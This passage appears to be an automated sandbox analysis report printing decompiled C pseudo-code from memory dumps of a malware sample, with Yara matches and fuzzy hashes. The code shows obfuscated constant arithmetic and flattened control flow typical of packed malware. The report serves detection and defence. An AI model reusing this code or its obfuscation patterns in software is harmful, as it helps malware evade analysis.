                                              				_v16 = _v16 ^ 0x220f51b4;
                                              				_v40 = 0x3232;
                                              				_t125 = 0x1f;
                                              				_v40 = _v40 / _t125;
                                              				_v40 = _v40 ^ 0x00004228;
                                              				_v36 = 0x2ec1;
                                              				_v36 = _v36 | 0xae4e7a63;
                                              				_v36 = _v36 ^ 0xae4e526e;
                                              				_v12 = 0xa12f;
                                              				_v12 = _v12 << 0xe;
                                              				_v12 = _v12 << 0xb;
                                              				_v12 = _v12 << 0x10;
                                              				_v12 = _v12 ^ 0x00007580;
                                              				_v32 = 0xadd8;
                                              				_v32 = _v32 | 0x6e6f3325;
                                              				_v32 = _v32 ^ 0x5adaef9e;
                                              				_v32 = _v32 ^ 0x34b54fa4;
                                              				_v28 = 0xb293;
                                              				_t126 = 0x3b;
                                              				_v28 = _v28 * 0x2d;
                                              				_v28 = _v28 << 0xb;
                                              				_v28 = _v28 ^ 0xfb1ed4cf;
                                              				_v24 = 0x2b1c;
                                              				_v24 = _v24 * 6;
                                              				_v24 = _v24 / _t126;
                                              				_v24 = _v24 ^ 0x00001462;
                                              				_t104 = E00227551(_a16, _v24);
                                              				_t127 = _t104;
                                              				if(_t104 != 0) {
                                              					_t128 = E00227663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
                                              					E00234F7D(_v32, _v28, _t127);
                                              				}
                                              				return _t128;
                                              			}




















                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: %3on
                                              • API String ID: 2962429428-3639271662
                                              • Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                              • Instruction ID: 35b915b03272bce07bbc79402d0d853c8e7ae1dabcf1b7215939dfeef1591426
                                              • Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                              • Instruction Fuzzy Hash: 0A413871E0020AABDB04DFE5D98A8EEFBB5FB44704F208159E911B7250D3B89B55CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E0022F536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				intOrPtr _v32;
                                              				void* _t73;
                                              				signed int _t84;
                                              
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t73);
                                              				_v28 = _v28 & 0x00000000;
                                              				_v32 = 0x4854b3;
                                              				_v8 = 0xdc0b;
                                              				_t84 = 0x56;
                                              				_v8 = _v8 * 0xf;
                                              				_v8 = _v8 >> 3;
                                              				_v8 = _v8 ^ 0x0001e73e;
                                              				_v12 = 0xfbc9;
                                              				_v12 = _v12 + 0xb4de;
                                              				_v12 = _v12 * 0x28;
                                              				_v12 = _v12 ^ 0x0043d2f8;
                                              				_v12 = 0x51f2;
                                              				_v12 = _v12 + 0xffffcc79;
                                              				_v12 = _v12 + 0xffffba87;
                                              				_v12 = _v12 ^ 0xffffb404;
                                              				_v12 = 0x6c9d;
                                              				_v12 = _v12 / _t84;
                                              				_v12 = _v12 >> 1;
                                              				_v12 = _v12 ^ 0x0000581b;
                                              				_v12 = 0x414e;
                                              				_v12 = _v12 >> 0xd;
                                              				_v12 = _v12 | 0x4fdc2cbe;
                                              				_v12 = _v12 ^ 0x4fdc7af3;
                                              				_v12 = 0xe540;
                                              				_v12 = _v12 * 0x6f;
                                              				_v12 = _v12 ^ 0x1b88e412;
                                              				_v12 = _v12 ^ 0x1bebfc09;
                                              				_v24 = 0x3d7;
                                              				_v24 = _v24 + 0xffffb00b;
                                              				_v24 = _v24 ^ 0xffff901a;
                                              				_v20 = 0xd6b0;
                                              				_v20 = _v20 ^ 0xee2b6cd1;
                                              				_v20 = _v20 ^ 0xee2bf683;
                                              				_v16 = 0x5822;
                                              				_v16 = _v16 + 0xa5f;
                                              				_v16 = _v16 ^ 0x00006b11;
                                              				return E002308F3(_v12, _v24, _v20, _a8, _t84, E0022C506(_t84), _v16);
                                              			}













                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: j^
                                              • API String ID: 0-2773993462
                                              • Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                              • Instruction ID: 5de1a9b292873cb5e0cd3814270d7cdac5b73812ed5732b42170da05f70f8adc
                                              • Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                              • Instruction Fuzzy Hash: 9B31EEB5C0070AEBDF48DFE4C98A49EBFB5FB00304F608089D511BA2A0D3B94B959F84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E00235D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				unsigned int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				intOrPtr _v88;
                                              				intOrPtr _v92;
                                              				intOrPtr _v96;
                                              				void* _t165;
                                              				intOrPtr* _t183;
                                              				void* _t185;
                                              				void* _t194;
                                              				signed int _t195;
                                              				signed int _t196;
                                              				signed int _t197;
                                              				void* _t198;
                                              				void* _t199;
                                              
                                              				_t183 = _a24;
                                              				_push(_t183);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0022602B(_t165);
                                              				_v96 = 0x1c20a7;
                                              				_t194 = 0;
                                              				_v84 = _v84 & 0;
                                              				_t199 = _t198 + 0x20;
                                              				_v92 = 0x7c153;
                                              				_v88 = 0xb2086;
                                              				_t185 = 0x2476afb9;
                                              				_v8 = 0x4175;
                                              				_v8 = _v8 + 0xffff57ff;
                                              				_v8 = _v8 | 0xfffbf4ff;
                                              				_v8 = _v8 ^ 0xffffd856;
                                              				_v56 = 0x400d;
                                              				_v56 = _v56 << 0xa;
                                              				_v56 = _v56 ^ 0x01004a82;
                                              				_v52 = 0xfa4b;
                                              				_t195 = 0x3f;
                                              				_v52 = _v52 * 0xf;
                                              				_v52 = _v52 ^ 0x000ed31b;
                                              				_v48 = 0x532b;
                                              				_v48 = _v48 | 0xa8aca4f9;
                                              				_v48 = _v48 ^ 0xa8acfbbc;
                                              				_v44 = 0x6cab;
                                              				_v44 = _v44 * 0xd;
                                              				_v44 = _v44 ^ 0x0005813c;
                                              				_v32 = 0xa076;
                                              				_v32 = _v32 + 0x7ba7;
                                              				_v32 = _v32 * 0x33;
                                              				_v32 = _v32 ^ 0x0038af53;
                                              				_v28 = 0x80ef;
                                              				_v28 = _v28 << 0xb;
                                              				_v28 = _v28 | 0xbfaa7514;
                                              				_v28 = _v28 ^ 0xbfaf1f10;
                                              				_v24 = 0x2421;
                                              				_v24 = _v24 / _t195;
                                              				_t196 = 3;
                                              				_v24 = _v24 / _t196;
                                              				_v24 = _v24 ^ 0x000050e2;
                                              				_v68 = 0xf6e5;
                                              				_v68 = _v68 >> 8;
                                              				_v68 = _v68 ^ 0x0000085c;
                                              				_v64 = 0x7950;
                                              				_v64 = _v64 | 0xc26498fa;
                                              				_v64 = _v64 ^ 0xc264e84e;
                                              				_v60 = 0xb7cc;
                                              				_v60 = _v60 + 0xffffacef;
                                              				_v60 = _v60 ^ 0x0000478a;
                                              				_v40 = 0x6379;
                                              				_v40 = _v40 >> 0xa;
                                              				_v40 = _v40 << 5;
                                              				_v40 = _v40 ^ 0x00006e22;
                                              				_v20 = 0xe665;
                                              				_v20 = _v20 << 9;
                                              				_v20 = _v20 ^ 0xe4ef8652;
                                              				_v20 = _v20 + 0xffffeafe;
                                              				_v20 = _v20 ^ 0xe52339cd;
                                              				_v80 = 0x4d1e;
                                              				_v80 = _v80 + 0xffffc710;
                                              				_v80 = _v80 ^ 0x000046ed;
                                              				_v16 = 0x18c;
                                              				_v16 = _v16 >> 4;
                                              				_t197 = _v80;
                                              				_v16 = _v16 * 0x41;
                                              				_v16 = _v16 ^ 0x73128289;
                                              				_v16 = _v16 ^ 0x7312c7aa;
                                              				_v12 = 0xdd0b;
                                              				_v12 = _v12 + 0xffff65de;
                                              				_v12 = _v12 * 0x3b;
                                              				_v12 = _v12 << 8;
                                              				_v12 = _v12 ^ 0x0f6bc641;
                                              				_v76 = 0xf5b7;
                                              				_v76 = _v76 ^ 0xdca6f1c9;
                                              				_v76 = _v76 ^ 0xdca64fd3;
                                              				_v36 = 0xdf9f;
                                              				_v36 = _v36 + 0x7ffe;
                                              				_v36 = _v36 + 0x4fda;
                                              				_v36 = _v36 ^ 0x00019ee0;
                                              				_v72 = 0x5c39;
                                              				_v72 = _v72 ^ 0x85106c7e;
                                              				_v72 = _v72 ^ 0x85105bd4;
                                              				do {
                                              					while(_t185 != 0x6efb3d4) {
                                              						if(_t185 == 0xfd0cdc7) {
                                              							_t197 = E002396CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
                                              							_t199 = _t199 + 0x38;
                                              							if(_t197 == 0) {
                                              								L15:
                                              								return _t194;
                                              							}
                                              							_t185 = 0x6efb3d4;
                                              							continue;
                                              						}
                                              						if(_t185 == 0x1eddc4e8) {
                                              							E002396CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
                                              							if(_t183 != 0) {
                                              								 *_t183 = _t197;
                                              							}
                                              							goto L15;
                                              						}
                                              						if(_t185 != 0x2476afb9) {
                                              							goto L11;
                                              						}
                                              						_t185 = 0xfd0cdc7;
                                              					}
                                              					_push(_t185);
                                              					_push(_t185);
                                              					_t194 = E00228736(_t197);
                                              					if(_t194 == 0) {
                                              						_t185 = 0x710c028;
                                              						goto L11;
                                              					}
                                              					_t185 = 0x1eddc4e8;
                                              					continue;
                                              					L11:
                                              				} while (_t185 != 0x710c028);
                                              				goto L15;
                                              			}

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Similarity
                                              • Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
                                              • Instruction ID: 36cffe11ec14a5d73b83360e1001a7895bec2d7bde001db02f68dc376432eb4c
                                              • Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
                                              • Instruction Fuzzy Hash: EF9147B2C1021AABDF19CFE5D98A5EEBFB5FF04314F208109E61176260D3B94A25CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E00230F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				void* _t132;
                                              				signed int _t149;
                                              				void* _t152;
                                              				void* _t154;
                                              				signed int _t173;
                                              				signed int _t174;
                                              				signed int _t175;
                                              				signed int _t176;
                                              				signed int _t177;
                                              				void* _t179;
                                              				void* _t180;
                                              				void* _t181;
                                              
                                              				_push(_a20);
                                              				_t152 = __edx;
                                              				_push(0xffffffff);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(0);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t132);
                                              				_v44 = 0x160;
                                              				_t181 = _t180 + 0x1c;
                                              				_v44 = _v44 ^ 0x1b432315;
                                              				_v44 = _v44 ^ 0x1b433d06;
                                              				_t179 = 0;
                                              				_v12 = 0x3352;
                                              				_t154 = 0x2476afb9;
                                              				_v12 = _v12 + 0xffffca9f;
                                              				_v12 = _v12 << 1;
                                              				_t173 = 0x29;
                                              				_v12 = _v12 / _t173;
                                              				_v12 = _v12 ^ 0x063e5c60;
                                              				_v8 = 0x701a;
                                              				_t174 = 0x52;
                                              				_v8 = _v8 / _t174;
                                              				_t175 = 0x4e;
                                              				_v8 = _v8 / _t175;
                                              				_t176 = 0x41;
                                              				_v8 = _v8 / _t176;
                                              				_v8 = _v8 ^ 0x0000431a;
                                              				_v40 = 0xf48c;
                                              				_v40 = _v40 + 0xffff0dc2;
                                              				_v40 = _v40 ^ 0x0000090f;
                                              				_v36 = 0x5475;
                                              				_v36 = _v36 << 0xf;
                                              				_v36 = _v36 ^ 0x2a3aa88b;
                                              				_v16 = 0xfc71;
                                              				_v16 = _v16 ^ 0x0a975394;
                                              				_v16 = _v16 | 0x3f9daa18;
                                              				_v16 = _v16 + 0xffff523a;
                                              				_v16 = _v16 ^ 0x3f9f63b5;
                                              				_v48 = 0xbfc9;
                                              				_t177 = 0x63;
                                              				_v48 = _v48 / _t177;
                                              				_v48 = _v48 ^ 0x0000151a;
                                              				_v32 = 0xfc2a;
                                              				_v32 = _v32 | 0x12ce1451;
                                              				_v32 = _v32 + 0x3ff4;
                                              				_v32 = _v32 ^ 0x12cf51f6;
                                              				_v56 = 0x5ac8;
                                              				_v56 = _v56 | 0xf85dcbd1;
                                              				_v56 = _v56 ^ 0xf85dd81d;
                                              				_v52 = 0x6e3;
                                              				_v52 = _v52 << 8;
                                              				_v52 = _v52 ^ 0x0006be09;
                                              				_v28 = 0x1612;
                                              				_v28 = _v28 ^ 0x471c56e0;
                                              				_v28 = _v28 >> 1;
                                              				_v28 = _v28 + 0xffff1cc1;
                                              				_v28 = _v28 ^ 0x238d2d3e;
                                              				_v24 = 0x515e;
                                              				_v24 = _v24 + 0x963f;
                                              				_v24 = _v24 + 0xffff7349;
                                              				_t178 = _v56;
                                              				_v24 = _v24 * 0x11;
                                              				_v24 = _v24 ^ 0x000650d8;
                                              				_v20 = 0x1a04;
                                              				_v20 = _v20 | 0x2258a5ab;
                                              				_v20 = _v20 + 0xffff2fa3;
                                              				_v20 = _v20 + 0x9894;
                                              				_v20 = _v20 ^ 0x2258a793;
                                              				do {
                                              					while(_t154 != 0x6efb3d4) {
                                              						if(_t154 == 0xfd0cdc7) {
                                              							_t149 = E00237AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
                                              							_t178 = _t149;
                                              							_t181 = _t181 + 0x24;
                                              							if(_t149 != 0) {
                                              								_t154 = 0x6efb3d4;
                                              								continue;
                                              							}
                                              						} else {
                                              							if(_t154 == 0x1eddc4e8) {
                                              								E00237AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
                                              							} else {
                                              								if(_t154 != 0x2476afb9) {
                                              									goto L11;
                                              								} else {
                                              									_t154 = 0xfd0cdc7;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              						L14:
                                              						return _t179;
                                              					}
                                              					_push(_t154);
                                              					_push(_t154);
                                              					_t179 = E00228736(_t178 + _t178);
                                              					if(_t179 == 0) {
                                              						_t154 = 0x710c028;
                                              						goto L11;
                                              					} else {
                                              						_t154 = 0x1eddc4e8;
                                              						continue;
                                              					}
                                              					goto L14;
                                              					L11:
                                              				} while (_t154 != 0x710c028);
                                              				goto L14;
                                              			}

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Similarity
                                              • Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
                                              • Instruction ID: e238bbf47414ea4e4bb0ad0629637f45aae5949ecef84e52b08756d05dbd2265
                                              • Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
                                              • Instruction Fuzzy Hash: 30617EB2D1130AEBDF18CFA5D9859EEBBB2FF44314F248219E512B6290D3B54A518F90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E0022F444(signed int __ecx) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				void* _t120;
                                              				signed int _t126;
                                              				signed int _t128;
                                              				signed int _t129;
                                              				signed int _t130;
                                              				signed int _t131;
                                              				intOrPtr* _t149;
                                              				intOrPtr _t152;
                                              				intOrPtr _t154;
                                              				void* _t159;
                                              				void* _t160;
                                              
                                              				_t128 = __ecx;
                                              				_t152 =  *0x23ca24; // 0x0
                                              				while(_t152 != 0) {
                                              					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
                                              						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
                                              					}
                                              					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
                                              				}
                                              				_t129 = _t128 | 0xffffffff;
                                              				_pop(_t153);
                                              				_t160 = _t159 - 0x2c;
                                              				_v8 = 0xa05a;
                                              				_v8 = _v8 | 0x4de4d3b6;
                                              				_t126 = _t129;
                                              				_t149 = 0x23ca24;
                                              				_t130 = 0x77;
                                              				_v8 = _v8 / _t130;
                                              				_v8 = _v8 >> 0xa;
                                              				_v8 = _v8 ^ 0x000036e5;
                                              				_v44 = 0x8c67;
                                              				_t131 = 0x67;
                                              				_v44 = _v44 * 0x22;
                                              				_v44 = _v44 ^ 0x00129d81;
                                              				_v24 = 0xef;
                                              				_v24 = _v24 + 0xffff82ae;
                                              				_v24 = _v24 >> 4;
                                              				_v24 = _v24 ^ 0x0fffc315;
                                              				_v12 = 0xac64;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 / _t131;
                                              				_v12 = _v12 ^ 0x56eede11;
                                              				_v12 = _v12 ^ 0x56ee9803;
                                              				_v32 = 0x5470;
                                              				_v32 = _v32 >> 1;
                                              				_v32 = _v32 << 7;
                                              				_v32 = _v32 ^ 0x00150b15;
                                              				_v36 = 0xc745;
                                              				_v36 = _v36 >> 0xb;
                                              				_v36 = _v36 >> 8;
                                              				_v36 = _v36 ^ 0x00006261;
                                              				_v16 = 0x5384;
                                              				_v16 = _v16 | 0x59782290;
                                              				_v16 = _v16 << 2;
                                              				_v16 = _v16 + 0xffff2741;
                                              				_v16 = _v16 ^ 0x65e0bd40;
                                              				_v20 = 0x334d;
                                              				_v20 = _v20 | 0xb04f2549;
                                              				_v20 = _v20 + 0xf20e;
                                              				_v20 = _v20 + 0x9932;
                                              				_v20 = _v20 ^ 0xb050c5c9;
                                              				_v40 = 0xe415;
                                              				_v40 = _v40 * 0x55;
                                              				_v40 = _v40 + 0x2e22;
                                              				_v40 = _v40 ^ 0x004bf03f;
                                              				_v48 = 0x3d8d;
                                              				_v48 = _v48 << 1;
                                              				_v48 = _v48 ^ 0x00006d20;
                                              				_v28 = 0x48e5;
                                              				_v28 = _v28 << 3;
                                              				_v28 = _v28 << 0xe;
                                              				_v28 = _v28 ^ 0x91ca0000;
                                              				_t154 =  *0x23ca24; // 0x0
                                              				while(_t154 != 0) {
                                              					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
                                              						L10:
                                              						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
                                              						_t120 = E0022F536(_v20, _v40, _v48, _t154);
                                              					} else {
                                              						_t120 = E0023086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
                                              						_t160 = _t160 + 0xc;
                                              						if(_t120 != _v28) {
                                              							_t112 = _t154 + 0x2c; // 0x2c
                                              							_t149 = _t112;
                                              						} else {
                                              							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
                                              							E0023422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
                                              							E00234F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
                                              							goto L10;
                                              						}
                                              					}
                                              					_t154 =  *_t149;
                                              				}
                                              				return _t120;
                                              			}


























                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab40681f94de22381ca7570a26f5348c257aec00c47af56da7adaef63678484c
                                              • Instruction ID: 30026303873513bf40a31bf3e97b1c794f12aa2ec590be87bafd65a7e85dc3d5
                                              • Opcode Fuzzy Hash: ab40681f94de22381ca7570a26f5348c257aec00c47af56da7adaef63678484c
                                              • Instruction Fuzzy Hash: 6E516472D00319EBDB18DFA4D98A9DEFBB0FB08318F208159D516772A0C7B46A95CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E002371EF(void* __edx, void* __eflags, intOrPtr _a4) {
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				char _v52;
                                              				intOrPtr _v56;
                                              				char _v60;
                                              				char _v68;
                                              				char _v144;
                                              				void* __ecx;
                                              				void* _t94;
                                              				void* _t106;
                                              				void* _t108;
                                              				void* _t110;
                                              				void* _t112;
                                              				void* _t114;
                                              				signed int _t120;
                                              				void* _t142;
                                              				void* _t144;
                                              				void* _t146;
                                              				void* _t147;
                                              
                                              				_t147 = __eflags;
                                              				_push(_a4);
                                              				_push(__edx);
                                              				E0022602B(_t94);
                                              				_v20 = 0xa5d0;
                                              				_v20 = _v20 | 0x3487ecbd;
                                              				_v20 = _v20 + 0xffff03d0;
                                              				_t142 = 0;
                                              				_v20 = _v20 + 0x3a47;
                                              				_v20 = _v20 ^ 0x348731c7;
                                              				_v28 = 0xdd31;
                                              				_v28 = _v28 << 0x10;
                                              				_v28 = _v28 | 0x8f0862d8;
                                              				_v28 = _v28 ^ 0xdf391de9;
                                              				_v16 = 0xb0e;
                                              				_v16 = _v16 << 4;
                                              				_v16 = _v16 << 0xa;
                                              				_t120 = 0x14;
                                              				_v16 = _v16 * 0x76;
                                              				_v16 = _v16 ^ 0x461d447c;
                                              				_v12 = 0xa74;
                                              				_v12 = _v12 << 0xc;
                                              				_v12 = _v12 + 0x835b;
                                              				_v12 = _v12 >> 1;
                                              				_v12 = _v12 ^ 0x0053bc14;
                                              				_v36 = 0xa6cf;
                                              				_v36 = _v36 << 1;
                                              				_v36 = _v36 ^ 0x000104b7;
                                              				_v24 = 0x4d22;
                                              				_v24 = _v24 >> 6;
                                              				_v24 = _v24 + 0xef2f;
                                              				_v24 = _v24 ^ 0x0000ed15;
                                              				_v44 = 0x3931;
                                              				_v44 = _v44 * 0x11;
                                              				_v44 = _v44 ^ 0x00039362;
                                              				_v40 = 0xec47;
                                              				_v40 = _v40 ^ 0x28f00c99;
                                              				_v40 = _v40 ^ 0x28f09017;
                                              				_v32 = 0x2800;
                                              				_v32 = _v32 / _t120;
                                              				_v32 = _v32 ^ 0x971b94ed;
                                              				_v32 = _v32 ^ 0x971b9d0a;
                                              				E002350F2( &_v144, _v20, _v28, _v16, __edx);
                                              				_t146 = _t144 + 0x18;
                                              				L13:
                                              				if(E0022B055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
                                              					_t106 = E00221280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
                                              					_t146 = _t146 + 0x10;
                                              					__eflags = _t106;
                                              					if(__eflags != 0) {
                                              						_t108 = _v56 - 1;
                                              						__eflags = _t108;
                                              						if(_t108 == 0) {
                                              							E00226754(_v60,  &_v52);
                                              						} else {
                                              							_t110 = _t108 - 1;
                                              							__eflags = _t110;
                                              							if(_t110 == 0) {
                                              								E00228F78(_v60,  &_v52);
                                              							} else {
                                              								_t112 = _t110 - 1;
                                              								__eflags = _t112;
                                              								if(_t112 == 0) {
                                              									E002326F5(_v60,  &_v52);
                                              								} else {
                                              									_t114 = _t112 - 1;
                                              									__eflags = _t114;
                                              									if(_t114 == 0) {
                                              										E00224A35(_v60,  &_v52);
                                              									} else {
                                              										__eflags = _t114 == 6;
                                              										if(_t114 == 6) {
                                              											E002269A0(_v60,  &_v52);
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						_t142 = _t142 + 1;
                                              						__eflags = _t142;
                                              					}
                                              					goto L13;
                                              				}
                                              				return _t142;
                                              			}






























                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
                                              • Instruction ID: 527278b05630599ec47ad7761af277311b54ce431ed92775ac6e3f76f315e5f7
                                              • Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
                                              • Instruction Fuzzy Hash: 6D5157B1D2421EABDF14DFE0D8858EEBBB5FF44304F108159D411B6290D7B85A59CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E00238ADC(intOrPtr* __ecx) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				char _v304;
                                              				char _t109;
                                              				void* _t115;
                                              				signed int _t117;
                                              				signed int _t118;
                                              				signed int _t119;
                                              				char* _t120;
                                              				intOrPtr* _t139;
                                              				void* _t140;
                                              
                                              				_v44 = 0xbe2c;
                                              				_v44 = _v44 | 0x84c59b93;
                                              				_v44 = _v44 ^ 0x84c5dc14;
                                              				_v12 = 0x6fb6;
                                              				_v12 = _v12 << 0xc;
                                              				_t139 = __ecx;
                                              				_t117 = 0x2e;
                                              				_v12 = _v12 / _t117;
                                              				_v12 = _v12 + 0xcda3;
                                              				_v12 = _v12 ^ 0x0027e688;
                                              				_v28 = 0xcabb;
                                              				_v28 = _v28 + 0xd310;
                                              				_v28 = _v28 | 0x3c203c9f;
                                              				_v28 = _v28 ^ 0x3c2189d4;
                                              				_v36 = 0x4eab;
                                              				_v36 = _v36 | 0x84b19700;
                                              				_v36 = _v36 ^ 0x84b1b180;
                                              				_v8 = 0xd8ee;
                                              				_v8 = _v8 + 0xffff63d4;
                                              				_v8 = _v8 ^ 0xfc264e39;
                                              				_v8 = _v8 ^ 0x6fc556fb;
                                              				_v8 = _v8 ^ 0x93e330d5;
                                              				_v20 = 0x5c82;
                                              				_v20 = _v20 | 0x7a047e0a;
                                              				_v20 = _v20 << 5;
                                              				_t118 = 0x1b;
                                              				_v20 = _v20 * 0x43;
                                              				_v20 = _v20 ^ 0xe5a3df6f;
                                              				_v40 = 0x7499;
                                              				_v40 = _v40 >> 8;
                                              				_v40 = _v40 ^ 0x0000130c;
                                              				_v16 = 0x5702;
                                              				_v16 = _v16 << 8;
                                              				_v16 = _v16 << 6;
                                              				_v16 = _v16 + 0xffffa72f;
                                              				_v16 = _v16 ^ 0x15c040b7;
                                              				_v32 = 0x67e1;
                                              				_v32 = _v32 / _t118;
                                              				_v32 = _v32 ^ 0x8e6cf5d6;
                                              				_v32 = _v32 ^ 0x8e6ccf96;
                                              				_v24 = 0x77;
                                              				_t119 = 0x69;
                                              				_v24 = _v24 * 0x25;
                                              				_t120 =  &_v304;
                                              				_v24 = _v24 / _t119;
                                              				_v24 = _v24 ^ 0x863bea64;
                                              				_v24 = _v24 ^ 0x863bfaf8;
                                              				while(1) {
                                              					_t109 =  *_t139;
